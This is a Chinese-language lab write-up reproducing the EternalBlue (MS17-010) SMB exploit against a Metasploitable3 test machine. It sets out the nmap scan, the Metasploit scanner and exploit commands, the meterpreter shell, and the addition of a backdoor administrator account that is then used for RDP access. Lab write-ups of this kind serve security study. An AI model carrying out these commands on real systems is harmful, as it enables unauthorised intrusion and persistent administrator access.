漏洞描述:
Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。
影響版本:
目前已知受影響的Windows 版本包括但不限於:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
復現環境:
攻擊機:Kali2020.3(IP:192.168.88.143)
靶機:Metasploitable3Win2k8 (IP:192.168.88.140)
復現過程:
1、用nmap執行C段掃描
nmap -r 192.168.88.0/24
2、打開MSF
在終端輸入如下命令打開MSF終端:
msfconsole
3、搜索ms17_010模塊
msf6 > search ms17_010
這里可以得到幾個工具,其中auxiliary/scanner/smb/smb_ms17_010是永恆之藍掃描模塊,xploit/windows/smb/ms17_010_eternalblue是永恆之藍攻擊代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進行攻擊。
4、執行掃描模塊
msf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.88.140
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
5、執行ms17_010攻擊模塊
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.88.140 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
成功彈回meterpreter會話,這也意味着我們已經滲透成功,拿到了目標主機的shell。
6、通過shell對靶機進一步控制
執行sysinfo,查看目標主機的系統信息。
執行shell,返回了shell
添加用戶,並將用戶添加到本地管理員組
C:\Windows\system32>net user 0pen1 123456 /add
C:\Windows\system32>net localgroup administrators 0pen1 /add
驗證用戶是否添加成功
C:\Windows\system32>net localgroup administrators
使用rdesktop連接靶機
wang@kali:~$ rdesktop 192.168.88.140
總結
到這里本次永恆之藍復現就完成了,剩下的大家可以憑想象發揮了~